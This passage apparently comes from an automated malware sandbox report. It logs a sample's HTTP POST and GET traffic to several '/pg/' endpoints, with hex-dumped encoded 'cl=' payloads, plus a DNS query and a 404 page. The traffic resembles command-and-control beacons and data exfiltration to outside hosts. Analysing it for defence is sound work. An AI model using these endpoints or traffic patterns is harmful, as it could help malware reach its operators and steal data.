cl=1lf-NjjthWFSNY2_kR8W8el3jOnexlCSFQ1TICCSmdiIWfhjEHoJAPvseznCg7mGRcAbjy2BUhFvYfh5cLpeqmi6iQM7Pro_QDOBoHng6mD4UD~k88IURGR4iONxgU68hR8oIWN-uSkfbjloU3ohR9KnEXn8dgybUSs9p8Jkr78HBmorcYyzNr4vD_iyztrZZYXMWL0vJ-uU84SlvKc0g7P7MLNsD54zOfCgYZfbKpZihDaO2HneSSpJRadXjJ(CsqybRFXSCQCNdGYng6xcJmVyOc2whkfQI1Nnslkjci(td5FL4bMpyWCdzLszWeI-JTlqcq7ihID7jTw5wqlMnwPRZayIgEklJoayCzipszll7_0WBqQa9pSjMDySU9VmDgMqPVYiBzTtU9aEfg).).
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.msdcong.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.msdcong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msdcong.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 31 6c 66 2d 4e 6e 66 66 73 47 52 44 4b 71 65 52 31 79 51 5f 31 74 6c 50 6c 2d 7a 61 34 57 54 72 4d 67 49 49 49 43 53 4f 7a 4d 7a 52 53 5f 39 6a 43 42 38 45 62 66 76 74 59 7a 6e 42 78 72 71 2d 4f 65 41 54 6a 7a 43 76 55 68 4e 67 57 39 70 47 63 62 70 4e 72 47 6d 73 7a 77 49 61 50 74 70 56 54 68 6a 48 74 47 62 67 6e 43 76 36 4a 57 69 42 37 5f 63 48 66 53 4a 35 6b 5f 6c 6a 67 6e 28 4c 68 79 42 48 65 48 52 38 6b 41 35 64 58 43 56 41 51 67 4d 69 55 74 65 73 42 55 62 76 58 68 75 66 58 54 73 31 6d 5a 39 6a 69 72 46 58 58 55 78 57 4a 35 47 4b 42 59 77 64 44 2d 6e 4e 37 37 43 64 54 37 6a 55 56 36 34 42 48 72 57 53 69 5f 79 55 6b 6f 6b 46 73 62 28 55 51 36 39 37 55 5a 55 69 65 4d 71 77 62 39 54 57 48 37 74 75 70 57 65 79 31 51 28 6f 50 43 5a 32 59 39 68 41 32 71 33 4b 72 73 4b 35 55 6c 58 70 52 51 43 42 4a 48 34 50 69 62 31 48 4a 33 6c 4d 41 37 4b 76 76 55 7a 52 4a 7a 45 61 69 6b 6b 32 50 69 58 68 4a 62 63 32 7a 75 73 79 35 42 79 68 28 62 73 75 57 59 63 35 4a 54 6c 49 63 76 50 4d 68 37 44 37 68 47 38 75 7a 49 4e 41 68 77 50 51 63 4d 53 47 70 57 78 34 4a 73 32 79 43 43 53 48 72 55 42 6c 28 74 73 5a 42 4f 38 61 74 70 53 6a 46 6a 7a 74 51 4d 30 42 4a 55 63 52 4e 6b 6c 6e 56 56 71 31 63 2d 37 70 42 74 34 5f 44 62 71 77 6a 55 61 53 78 2d 71 63 74 37 4a 6c 6f 33 42 75 50 5a 59 38 61 6c 4b 4c 69 4d 52 38 51 54 46 71 33 77 4f 70 4e 4a 5a 77 4f 68 71 46 71 68 51 72 74 74 7a 6c 79 57 65 39 57 36 55 70 4b 4c 69 56 33 47 62 46 50 55 6c 74 51 53 39 6f 6e 77 4b 6f 39 38 41 74 45 6c 47 73 37 48 79 70 31 4e 4b 79 6b 65 78 31 33 4b 4a 6a 38 43 56 71 64 55 55 34 51 69 54 52 6c 66 46 38 58 76 6c 73 51 38 76 62 6a 4a 65 4c 69 69 4b 47 36 59 41 6c 6c 71 4c 67 4f 44 30 67 58 44 73 37 6e 45 58 63 78 44 61 34 64 66 79 4f 52 6d 57 46 37 59 65 4f 33 50 36 6e 67 77 54 32 56 6c 35 76 6b 39 77 44 69 44 7e 64 62 78 49 58 74 4f 51 59 62 45 6c 79 73 50 50 66 61 74 4f 77 59 53 41 56 63 4e 31 7a 72 77 73 43 48 5f 71 2d 61 33 50 70 6e 59 59 35 70 48 4b 5a 70 34 57 4c 56 30 58 65 63 38 51 47 41 67 78 58 42 4b 73 45 63 46 4d 33 6e 44 6d 6e 61 55 6e 57 37 54 57 6a 67 42 32 48 5a 2d 4e 4a 39 74 39 61 32 67 79 37 37 49 4d 65 4b 77 34 44 36 6a 74 6d 75 57 56 69 71 42 54 61 74 79 48 64 72 6f 46 62 53 53 5a 71 63 48 61 6c 65 72 4b 38 62 49 32 61 77 77 64 45 70 4d 71 4e 79 43 35 6e 65 50 79 4c 6a 57 77 39 70 4a 55 30 31 58 78 43 4a 31 7e 4c 6a 70 67 63 79 36 28 64 54 4c 6e 5f 69 4e 76 45 37 4b 59 76 46 71 37 43 49 36 61 61 79 77 74 70 39 53 69 36 6a 78 4e 5f 35 31 37 76 42 35 37 38 67 47 4e 4b 62 6c 65 4a 56 7a 64 6d 64 62 78 64 55 38 6e 46 51 52 6b 65 7e 37 28 61 67 4b 64 32 65 35 36 2d 61 51 32 62 41
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.wshlzhx.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.wshlzhx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wshlzhx.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 41 4d 33 30 55 65 78 69 6c 71 37 37 6b 65 44 4a 57 6e 34 6b 65 6f 54 4f 30 76 66 4b 56 6b 4b 61 4b 53 68 56 77 4c 44 76 53 44 65 68 6c 2d 58 72 42 31 38 54 74 52 47 6e 6e 6f 28 63 61 6e 72 44 62 77 68 62 4f 42 58 75 32 58 47 42 52 37 4c 44 5a 4b 46 52 54 30 30 50 73 44 55 35 55 78 59 63 33 52 45 55 52 53 70 58 72 4b 62 6e 4a 55 69 64 72 43 6b 34 52 57 62 75 37 36 57 4d 41 71 35 6d 43 35 70 58 54 32 38 5a 78 70 47 75 4b 49 6b 32 6a 55 32 56 35 39 43 46 69 5a 65 66 6d 37 47 43 45 53 51 51 73 52 57 67 72 2d 79 71 59 6d 78 6d 70 45 75 78 38 38 43 46 59 70 72 31 48 4d 34 59 71 73 55 77 6c 4a 30 39 5a 35 30 59 41 72 79 54 55 6b 5a 58 28 76 39 45 74 5a 7a 69 55 79 6e 6a 63 45 69 41 55 52 75 68 6d 63 4e 72 54 41 53 54 32 34 58 48 55 79 7e 74 64 5f 45 43 63 4c 38 79 42 61 34 76 64 30 43 6e 7e 6f 30 6a 78 36 4f 4b 75 55 74 54 32 48 36 54 74 4d 4a 30 79 79 5a 4b 38 56 47 4c 49 61 79 58 61 7a 4a 67 32 56 4e 56 76 31 79 5f 49 45 35 57 32 6c 59 79 53 6b 37 61 6f 35 48 34 54 70 72 54 50 6e 76 36 66 79 77 36 46 58 6a 64 55 54 4e 4f 64 63 68 43 43 5a 76 32 47 6a 31 39 36 6d 67 47 61 36 6a 53 36 75 42 57 4e 56 61 46 4d 64 4a 49 46 4c 62 39 4e 63 78 74 66 4e 5a 67 39 68 42 54 69 44 4f 30 55 4a 66 62 6f 51 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: cl=AM30Uexilq77keDJWn4keoTO0vfKVkKaKShVwLDvSDehl-XrB18TtRGnno(canrDbwhbOBXu2XGBR7LDZKFRT00PsDU5UxYc3REURSpXrKbnJUidrCk4RWbu76WMAq5mC5pXT28ZxpGuKIk2jU2V59CFiZefm7GCESQQsRWgr-yqYmxmpEux88CFYpr1HM4YqsUwlJ09Z50YAryTUkZX(v9EtZziUynjcEiAURuhmcNrTAST24XHUy~td_ECcL8yBa4vd0Cn~o0jx6OKuUtT2H6TtMJ0yyZK8VGLIayXazJg2VNVv1y_IE5W2lYySk7ao5H4TprTPnv6fyw6FXjdUTNOdchCCZv2Gj196mgGa6jS6uBWNVaFMdJIFLb9NcxtfNZg9hBTiDO0UJfboQ).).
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.wshlzhx.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.wshlzhx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wshlzhx.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 41 4d 33 30 55 63 52 32 32 4b 28 51 76 4d 61 36 47 41 67 46 54 59 4c 62 79 66 62 77 4b 6a 47 67 55 77 31 6a 77 4b 79 48 64 69 4f 7a 79 75 48 72 48 7a 67 49 67 52 47 6b 32 34 28 66 4e 33 6e 5f 55 79 52 54 4f 41 54 49 32 58 4f 4f 62 63 37 47 5a 36 46 38 54 55 49 5f 75 44 51 59 55 7a 74 30 30 7a 6f 63 55 53 6c 58 6c 65 28 68 51 55 65 47 73 47 4d 33 50 32 32 71 33 62 50 4d 41 64 70 53 44 62 56 35 46 6a 59 62 69 71 61 70 47 73 5a 52 30 54 43 67 6d 64 47 43 37 6f 47 4d 70 34 69 47 48 54 52 77 70 51 57 6a 30 64 43 65 49 78 56 45 69 52 4c 46 77 4d 79 33 59 72 4c 44 5a 65 74 45 75 74 49 34 6b 39 6b 62 4e 63 55 61 65 73 65 4c 44 33 77 78 35 76 73 57 31 61 6e 48 44 32 58 4d 64 43 76 64 4a 6c 44 66 67 6f 64 6e 59 56 76 6b 33 4c 37 31 59 54 50 35 52 65 41 5a 4f 61 64 78 43 63 41 37 5a 55 44 4a 38 6f 31 78 7e 75 62 31 6c 56 6c 59 35 30 7a 79 73 50 5a 6a 34 43 31 50 39 58 43 44 47 65 6e 5f 57 67 5a 73 39 47 55 73 6b 45 32 6b 42 54 35 59 6f 56 5a 71 53 6d 43 59 6f 35 48 65 54 74 28 70 4f 57 72 36 65 6d 6b 54 47 32 6a 5a 53 54 4e 70 54 73 78 41 4d 4a 44 6d 47 6e 5a 39 37 57 52 64 62 4e 66 53 70 72 46 56 4e 30 61 46 43 4e 4a 49 49 72 62 7a 43 75 63 39 51 64 64 42 7e 69 63 59 67 57 48 48 65 4b 6d 6f 32 54 79 6c 4b 65 37 54 50 63 51 65 76 50 77 64 6d 36 30 32 41 77 51 6d 46 41 65 4d 62 7a 48 4c 5a 51 41 34 42 68 6d 79 28 2d 37 66 61 72 6a 63 4b 39 53 42 78 57 62 79 79 4c 45 31 49 33 67 61 68 49 72 43 79 61 35 30 63 38 28 56 41 6d 74 4d 74 5a 64 58 4f 37 6d 46 4f 5f 72 4f 38 2d 63 39 57 33 36 79 51 47 71 2d 70 33 6d 41 34 7a 68 38 72 48 73 71 66 54 68 4e 31 4b 69 39 76 62 31 32 41 35 77 79 36 73 64 73 49 35 35 73 4f 4d 4e 75 66 70 76 41 28 6c 47 51 33 53 6a 37 63 56 63 75 6f 4e 4a 36 6a 6d 51 47 61 65 35 34 68 64 75 31 38 31 55 50 4c 32 73 7a 58 65 50 64 68 43 6d 78 74 59 76 79 6e 7a 6d 65 56 67 75 63 59 31 70 41 61 51 6c 67 67 6f 6b 4d 65 4e 35 70 33 4a 31 70 47 64 70 4a 37 76 65 49 65 49 43 74 72 71 5a 49 54 38 28 4e 77 78 76 32 6e 4d 55 44 32 45 6d 46 4e 34 64 4e 6f 4c 74 75 7e 47 51 55 59 41 6c 42 6e 4f 43 30 55 46 54 4b 46 63 6c 61 6f 4d 39 54 30 61 4b 54 69 58 73 6f 65 76 4a 51 35 77 73 58 49 36 6b 59 35 56 53 35 73 4e 38 72 42 68 74 79 58 48 55 42 72 32 42 54 46 76 31 44 35 6d 72 77 57 61 4e 37 45 4b 6f 75 42 5a 44 38 6d 6f 32 64 79 4e 57 4d 62 51 69 73 43 56 59 4f 55 32 4f 71 6e 53 45 4e 74 4b 66 4b 4c 4b 7a 67 51 67 7e 65 54 72 4f 71 52 7a 58 71 73 32 75 45 42 47 4f 72 58 48 58 59 6a 76 48 6b 4c 4d 39 4c 4b 30 35 4a 49 62 36 5f 31 35 63 44 76 35 51 49 48 39 45 44 6a 6e 64 50 38 4f 6f 7a 34 34 79 69 76 62 50 73 4b 38 63 2d 79 50 73 37 7a 78 77 70 6d 72 33 74 44
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.zcn4.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.zcn4.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zcn4.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 78 48 6a 5f 6a 2d 73 71 48 6b 64 2d 74 76 34 51 59 67 69 5f 38 44 54 32 6b 59 69 66 68 4c 69 5f 46 37 58 44 43 4e 66 33 28 48 6f 61 39 31 4b 67 57 56 5a 57 72 71 45 53 47 47 4f 50 69 52 38 6d 4a 59 31 50 52 57 70 56 59 54 33 67 37 4c 74 59 57 30 64 59 56 4b 77 63 78 63 38 38 79 55 78 72 6a 4e 6a 50 74 65 4d 53 65 6b 72 54 37 42 74 61 50 39 69 2d 6e 58 4e 71 6c 62 4c 4f 62 33 7a 4b 30 5a 37 53 79 5a 68 5a 76 75 72 33 49 2d 73 41 4e 6d 6a 50 6a 42 61 66 30 62 69 42 79 70 54 79 48 37 54 57 57 6d 46 33 62 6b 43 55 51 4a 63 64 75 4a 31 61 6b 4f 5a 76 74 73 65 59 57 57 74 2d 32 59 48 63 54 56 69 72 33 4e 39 34 4c 42 35 6c 33 4f 7a 38 43 33 6b 64 73 33 4b 45 33 33 6d 5f 79 75 65 51 6c 6e 63 51 7e 79 63 6b 30 56 70 58 74 67 51 32 71 64 62 44 44 6b 4e 36 37 54 28 57 44 72 6a 4d 68 37 77 4b 37 4a 44 69 41 49 51 77 37 47 6b 70 66 70 49 41 28 74 39 34 74 5a 49 70 6b 62 63 47 48 67 59 59 32 6e 44 54 6d 61 36 4a 4b 5a 4c 61 55 46 61 61 43 35 77 32 58 72 77 61 62 77 64 6d 72 59 6a 77 74 41 4e 34 4f 70 69 49 45 6c 53 50 4f 72 32 64 71 35 4b 6d 71 75 73 4e 58 71 6d 51 48 74 35 4c 66 69 59 6a 57 5f 64 47 74 39 69 6c 31 6e 38 4a 64 76 6a 52 35 38 64 67 4e 59 45 4d 6e 53 52 6d 33 65 57 42 75 76 62 63 6a 77 29 2e 00 55 4a 66 62 6f 51 29 Data Ascii: cl=xHj_j-sqHkd-tv4QYgi_8DT2kYifhLi_F7XDCNf3(Hoa91KgWVZWrqESGGOPiR8mJY1PRWpVYT3g7LtYW0dYVKwcxc88yUxrjNjPteMSekrT7BtaP9i-nXNqlbLOb3zK0Z7SyZhZvur3I-sANmjPjBaf0biBypTyH7TWWmF3bkCUQJcduJ1akOZvtseYWWt-2YHcTVir3N94LB5l3Oz8C3kds3KE33m_yueQlncQ~yck0VpXtgQ2qdbDDkN67T(WDrjMh7wK7JDiAIQw7GkpfpIA(t94tZIpkbcGHgYY2nDTma6JKZLaUFaaC5w2XrwabwdmrYjwtAN4OpiIElSPOr2dq5KmqusNXqmQHt5LfiYjW_dGt9il1n8JdvjR58dgNYEMnSRm3eWBuvbcjw).UJfboQ)
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.zcn4.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.zcn4.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zcn4.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 78 48 6a 5f 6a 36 77 55 42 55 59 6c 28 4a 46 6c 66 54 4f 65 6f 6d 54 77 6f 49 32 70 7e 49 79 42 48 72 37 54 43 4e 50 7a 33 6c 52 47 34 55 61 67 64 77 74 49 6d 71 45 4e 41 47 4f 4f 6d 52 67 77 41 76 49 44 52 58 64 5f 59 54 28 68 79 74 42 64 58 6b 64 31 45 61 30 67 67 4d 6f 37 79 53 77 4c 6a 76 4f 63 6f 65 41 53 41 45 7a 52 69 41 39 4e 47 63 75 78 71 48 51 42 70 36 53 51 62 6e 50 32 30 37 48 30 6a 64 68 68 71 64 32 31 44 65 63 73 4a 31 44 51 38 68 4f 55 6f 49 65 6f 74 59 66 32 47 36 53 6a 4b 58 46 30 57 30 71 61 47 37 46 67 71 38 52 4a 33 75 49 63 74 72 69 69 4f 56 4a 76 79 65 43 52 52 6e 47 42 28 5a 6c 36 45 51 35 39 6d 64 62 42 50 57 31 4a 6b 55 65 68 38 30 53 71 28 49 44 62 72 6c 73 72 34 44 67 57 38 45 5a 6a 39 41 6b 2d 6d 38 72 38 4a 48 63 36 73 79 66 6b 4e 4a 50 6d 6b 62 78 6d 6f 5a 44 75 49 61 6f 4d 74 48 67 32 4e 70 34 69 7e 74 45 6b 6a 6f 6b 6f 70 35 59 34 4e 6b 30 6a 77 45 7a 48 74 49 54 2d 50 4c 6e 76 64 57 48 72 66 4a 78 35 58 70 59 56 62 77 64 55 72 5a 69 56 69 52 5a 34 50 34 43 62 48 47 37 41 47 4c 33 66 6f 74 75 65 6b 38 34 64 58 71 7e 51 45 34 64 79 66 52 49 6a 61 4a 78 48 74 63 69 6c 32 58 38 4a 45 66 69 4e 34 4f 73 52 54 39 51 75 6d 6b 51 79 32 70 48 39 36 5f 79 54 67 6d 6c 6b 44 37 4f 79 33 4f 77 69 74 58 51 38 67 52 39 33 39 59 54 6a 35 77 4d 46 28 72 47 49 44 61 79 42 41 74 63 30 4e 35 4a 49 62 71 51 31 73 6c 41 5f 44 73 41 70 78 70 53 50 67 33 61 59 70 4a 62 5f 62 43 79 35 4a 4c 54 73 70 76 41 72 4e 4b 41 5f 43 73 73 54 33 7a 67 6a 42 34 4b 56 37 51 6a 44 7a 7a 39 33 64 73 4d 6a 4a 77 62 44 65 57 69 78 75 72 69 57 47 31 61 36 67 46 78 79 35 75 72 54 68 47 7a 31 62 59 30 51 33 68 63 42 69 63 33 4d 68 48 39 62 78 58 4f 66 59 68 28 42 79 4e 4e 4a 5a 56 6d 4a 39 56 50 63 33 49 49 6f 6b 4b 33 39 44 4a 30 34 32 52 46 53 6a 59 39 66 77 50 30 5a 67 51 48 53 43 56 68 4b 7a 46 42 74 41 62 71 4b 62 51 32 43 37 55 79 42 31 5f 4c 37 58 55 35 4c 74 51 61 67 31 39 34 76 4a 48 44 32 74 62 59 4c 61 70 77 31 41 61 6a 63 4e 6e 54 6e 64 65 4b 30 70 45 6b 41 55 44 74 4d 56 2d 38 50 30 57 72 67 6d 30 48 33 74 77 44 59 6b 5f 32 4a 48 41 41 48 56 76 33 38 33 39 44 63 4e 47 47 4a 39 2d 7a 56 66 47 59 2d 72 35 32 5f 53 34 38 39 6e 30 52 50 57 50 6b 33 75 68 42 38 6a 47 77 72 55 32 32 67 43 4f 4c 43 62 57 34 67 70 56 47 33 77 72 32 56 42 65 4a 77 57 71 73 43 4d 77 74 77 45 65 57 78 76 71 71 50 62 45 52 78 47 71 69 56 46 67 75 41 52 77 4a 63 4d 39 31 74 52 55 6b 69 70 61 52 58 6d 4c 53 2d 70 48 34 62 67 70 67 77 38 61 55 4f 6c 66 4e 30 74 72 69 63 6a 70 4b 43 65 59 42 55 53 6e 63 6b 34 73 49 4b 6c 34 4c 50 64 74 39 45 6e 34 34 42 51 59 59 65 28 42 68 4e 55 50 68 76
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1Host: www.alwaysbucheon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=bp3gRoXoP4yEgK1sgJSYJfU+FssScB904rbINqXJ/OBc+k4pi0Qt4zKRKRSxUz2ykIhM&2drl7=sL04ivN0C HTTP/1.1Host: www.frengeen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=RA/4Irk5P4f6SUywnqVLcdKqFQC5UyywDrBVn7AQH3o0gkoTjo44CDVTLwAwj/6QVTo4&2drl7=sL04ivN0C HTTP/1.1Host: www.aalldxea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=9HTETHSv3BkodYmkolV6gIdBk+nR/n7VQF8IV1eTi9ORfvNnIi0cIKnqFVKcp7KNM91B&2drl7=sL04ivN0C HTTP/1.1Host: www.msdcong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=Iu7OK7c719yg5+rObwJSE42h0tf2fXC4Qmo10pi2UhOWitvONWxHvB/i0oS+D3HNIxcl&2drl7=sL04ivN0C HTTP/1.1Host: www.wshlzhx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=5lvF9aNASzw0/ednaHrHq3bCrY2s26KKXO6afqfWx34cy2T8YgpekM9WcQWNtwYcYtQM&2drl7=sL04ivN0C HTTP/1.1Host: www.zcn4.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1Host: www.alwaysbucheon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.hot7slot.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 50 57 30 65 64 37 38 33 61 70 2d 6b 65 76 75 62 72 6f 67 52 39 4d 46 4b 51 35 6d 69 73 75 4d 5a 72 69 52 33 65 35 6d 28 51 77 49 6c 33 68 6f 77 30 4c 56 63 69 69 31 58 41 47 49 79 34 67 6e 75 45 4b 44 36 4c 4c 4e 6d 41 33 41 58 62 6c 45 4c 57 6c 45 75 61 7e 5f 79 31 4a 32 32 43 7e 33 4d 53 41 7a 41 38 50 47 36 41 36 41 72 54 56 49 33 68 6f 55 57 4b 6c 6c 51 6d 51 65 76 5a 4c 54 38 70 6b 35 4c 35 43 72 66 70 71 69 46 73 6b 58 35 64 58 47 6d 37 74 55 6a 42 66 58 61 31 6c 66 37 78 67 79 78 56 77 54 4c 71 50 75 5a 45 78 41 4e 31 48 39 55 75 36 51 53 5a 43 4e 5a 7a 52 62 6d 37 41 50 77 55 67 33 7e 71 6d 61 32 5a 6c 6c 42 72 55 63 38 44 71 77 4d 6f 39 59 6b 42 58 42 69 5a 63 61 55 37 59 55 28 63 53 39 55 77 69 4d 36 78 71 69 78 72 67 59 43 75 38 6f 59 5f 61 79 75 57 67 43 6e 67 36 2d 71 61 76 35 45 4b 54 44 62 5f 47 5a 59 48 42 47 58 73 71 33 78 6b 39 38 34 76 70 71 38 79 6a 6d 51 64 37 46 42 55 36 55 75 58 57 35 49 6f 39 33 65 6d 54 68 38 58 41 5f 65 7a 5a 69 4f 41 76 4e 43 51 35 41 30 47 31 36 76 69 4c 6f 55 6b 45 79 5a 5a 76 70 73 76 56 5a 34 56 76 42 4d 77 54 79 78 54 55 50 51 51 66 4b 71 41 52 30 76 48 73 30 7e 31 49 4f 31 51 73 64 49 36 4d 65 69 5f 47 79 45 6e 79 61 4b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: cl=TL7aPPW0ed783ap-kevubrogR9MFKQ5misuMZriR3e5m(QwIl3how0LVcii1XAGIy4gnuEKD6LLNmA3AXblELWlEua~_y1J22C~3MSAzA8PG6A6ArTVI3hoUWKllQmQevZLT8pk5L5CrfpqiFskX5dXGm7tUjBfXa1lf7xgyxVwTLqPuZExAN1H9Uu6QSZCNZzRbm7APwUg3~qma2ZllBrUc8DqwMo9YkBXBiZcaU7YU(cS9UwiM6xqixrgYCu8oY_ayuWgCng6-qav5EKTDb_GZYHBGXsq3xk984vpq8yjmQd7FBU6UuXW5Io93emTh8XA_ezZiOAvNCQ5A0G16viLoUkEyZZvpsvVZ4VvBMwTyxTUPQQfKqAR0vHs0~1IO1QsdI6Mei_GyEnyaKA).
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Mar 2020 17:58:44 GMTServer: ApacheLast-Modified: Thu, 26 Mar 2020 02:08:11 GMTETag: "720-5a1b874e878c0"Accept-Ranges: bytesContent-Length: 1824Connection: closeContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 49 53 54 4f 52 59 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 74 31 2e 64 61 75 6d 63 64 6e 2e 6e 65 74 2f 74 69 73 74 6f 72 79 5f 61 64 6d 69 6e 2f 77 77 77 2f 73 74 79 6c 65 2f 74 6f 70 2f 66 6f 6e 74 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 74 31 2e 64 61 75 6d 63 64 6e 2e 6e 65 74 2f 74 69 73 74 6f 72 79 5f 61 64 6d 69 6e 2f 77 77 77 2f 73 74 79 6c 65 2f 74 6f 70 2f 65 72 72 6f 72 5f 32 30 31 39 30 38 31 34 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 49 6e 64 65 78 22 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 6b 61 6b 61 6f 42 6f 64 79 22 3e eb b3 b8 eb ac b8 20 eb b0 94 eb a1 9c ea b0 80 ea b8 b0 3c 2f 61 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 6b 61 6b 61 6f 47 6e 62 22 3e eb a9 94 eb 89 b4 20 eb b0 94 eb a1 9c ea b0 80 ea b8 b0 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 57 72 61 70 22 20 63 6c 61 73 73 3d 22 74 69 73 74 6f 72 79 5f 74 79 70 65 33 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 43 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 4d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 41 72 74 69 63 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 5f 65 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 5f 74 69 73 74 6f 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 69 64 3d 22 6b 61 6b 61 6f 42 6f 64 79 22 20 63 6c 6
Urls found in memory or binary dataShow sources
